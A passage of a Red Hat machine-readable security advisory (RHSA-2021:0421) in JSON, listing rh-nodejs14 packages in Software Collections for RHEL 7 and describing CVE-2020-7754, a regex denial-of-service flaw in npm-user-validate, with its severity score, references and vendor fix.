"name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src" }, "product_reference": "rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch" }, "product_reference": "rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le" }, "product_reference": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x" }, "product_reference": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7)", "product_id": "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" }, "product_reference": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "relates_to_product_reference": "7Server-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.src as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src" }, "product_reference": "rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64" }, "product_reference": "rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch" }, "product_reference": "rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le" }, "product_reference": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x" }, "product_reference": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "relates_to_product_reference": "7Workstation-RHSCL-3.6" }, { "category": "default_component_of", "full_product_name": { "name": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64 as a component of Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7)", "product_id": "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" }, "product_reference": "rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "relates_to_product_reference": "7Workstation-RHSCL-3.6" } ] }, "vulnerabilities": [ { "cve": "CVE-2020-7754", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-10-18T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1892430" } ], "notes": [ { "category": "description", "text": "This affects the package npm-user-validate before 1.0.1. The regex that validates user emails took exponentially longer to process long input strings beginning with @ characters.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS", "title": "Vulnerability summary" }, { "category": "other", "text": "In Red Hat Enterprise Linux 8 and Software Collections, `npm-user-validate` is used exclusively for `npm`. As a result, this vulnerability is considered Low in such a context.\n\nIn OpenShift Container Platform (OCP) 3.11 and 4.4 the kibana package has been marked Low (similar to RHEL8) as it is primarily used for npm and is protected via OpenShift OAuth. Additionally, whilst OCP 4.4 does deliver the kibana package, due to the code changing to container first content, it has been marked as wontfix at this time and may be fixed in a future release. \n\nAdditionally, the openshift4/ose-logging-kibana6 container is not represented on the CVE page as it gets npm from the Red Hat Software Collections and as such the ose-logging-kibana6 container will be updated when the rh-nodejs10-nodejs package is.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7754" }, { "category": "external", "summary": "RHBZ#1892430", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1892430" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7754", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7754" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7754", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7754" }, { "category": "external", "summary": "https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p", "url": "https://github.com/npm/npm-user-validate/security/advisories/GHSA-xgh6-85xh-479p" } ], "release_date": "2020-10-16T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-04T17:20:51+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0421" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "version": "3.0" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-debuginfo-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-devel-0:14.15.4-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-nodejs-docs-0:14.15.4-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs14-npm-0:6.14.10-14.15.4.2.el7.ppc64le", 